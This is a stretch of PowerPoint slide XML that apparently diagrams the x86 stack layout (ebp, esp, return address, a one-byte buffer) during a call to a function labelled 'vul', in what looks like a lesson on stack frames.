            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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16" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391299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717" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901388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718" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901401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719" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3696248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720" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3696248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721" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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22" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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23" name="0xe0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901388" y="7299919"/>
              <a:ext cx="109556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0xe0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="724" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8621" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="725" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="956169" y="92950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6" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="81381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961279" y="8494989"/>
              <a:ext cx="1078458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729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0xe4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0x8048435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732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733" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="734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0x8048438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759" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033142" y="3709710"/>
            <a:ext cx="6996936" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6996934" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="735" name="rutern address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2438179" y="6911378"/>
              <a:ext cx="305205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rutern address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="736" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2475994" y="6073178"/>
              <a:ext cx="300182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prev ebp point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="737" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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38" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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39" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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40" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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41" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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42" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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43" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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44" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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45" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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46" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391287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747" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901376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748" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901388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749" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3696236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750" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3696236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751" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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52" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159398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53" name="0xe0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901376" y="7299919"/>
              <a:ext cx="109555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0xe0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="754" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8608" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="755" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="956157" y="929508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6" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="72999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757" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="961279" y="7656789"/>
              <a:ext cx="1078458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8" name="null"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3568988" y="7749578"/>
              <a:ext cx="8158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null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762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763" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="764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0xdc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0x804840b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791" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15035407" y="3709710"/>
            <a:ext cx="6994671" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6994669" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="765" name="0x804843d"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2791180" y="6911378"/>
              <a:ext cx="236692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0x804843d</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="766" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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5" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3389022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776" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5899111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777" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5899123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778" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3693971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779" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3693971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780" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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81" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2157133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82" name="0xe0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5899111" y="7299919"/>
              <a:ext cx="109555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0xe0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="785" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6343" y="8976319"/>
              <a:ext cx="2027050" cy="637541"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2027048" cy="637540"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="783" name="ebp"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="993984" cy="637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ebp </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="784" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="947548" y="318769"/>
                <a:ext cx="1079501" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="127000" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent4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88" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="6441478"/>
              <a:ext cx="2039737" cy="637541"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2039736" cy="637540"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="786" name="esp"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="968311" cy="637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esp </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="787" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="961279" y="356869"/>
                <a:ext cx="1078458" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="127000" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent4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89" name="null"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3566723" y="7749578"/>
              <a:ext cx="8158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null</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="790" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2473729" y="6073178"/>
              <a:ext cx="300182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prev ebp point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79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795" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="796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7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8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9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0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1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2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3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4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5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806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807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808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09" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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10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1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2" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15041751" y="12686030"/>
            <a:ext cx="99398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ebp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15989300" y="13004800"/>
            <a:ext cx="1079501" cy="0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15" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="9695259"/>
            <a:ext cx="1078457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816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0xd8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0x804840c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817" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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818" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="84128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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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82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825" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826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7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8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9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0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1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2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3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4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5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836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837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838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39" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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40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1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2" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="843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0xd8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0xd8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0x804840e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844" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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845" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="ebp/esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14185230" y="9371330"/>
            <a:ext cx="173113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ebp/esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15989300" y="9690099"/>
            <a:ext cx="1079501" cy="2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49" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="20366909" y="8387984"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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2" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="17291904" y="7993979"/>
            <a:ext cx="862040" cy="862040"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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3" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="17820595" y="7993979"/>
            <a:ext cx="862039" cy="862040"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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4" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="18309509" y="7994240"/>
            <a:ext cx="862040" cy="862039"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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5" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="18829406" y="7994240"/>
            <a:ext cx="862040" cy="862039"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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6" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="19327114" y="7994240"/>
            <a:ext cx="862039" cy="862039"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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7" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="19831948" y="7994240"/>
            <a:ext cx="862039" cy="862039"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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8" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="17191909" y="7992781"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="00FD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9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860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861" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862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3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4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5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6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7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8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9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0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1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872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873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874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75" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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76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7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8" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="881" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="7682230"/>
            <a:ext cx="2027050" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="879" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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880" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="31876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882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0xd8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0xc0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0x8048411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883" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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884" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="885" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8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15994422" y="9695259"/>
            <a:ext cx="1078457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87" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="8669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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="888" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="889" name="char buf[1]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17160146" y="7919719"/>
            <a:ext cx="3704665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solidFill>
                  <a:srgbClr val="4D4E4D"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>char buf[1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="890" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="89446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91" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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89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895" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896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7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8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9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0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1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2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3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4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5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906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907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908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09" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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10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1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2" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="913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0xd8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0xb4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0x8048414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914" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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915" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="917" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="9695259"/>
            <a:ext cx="1078457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8" name="ebp"/>
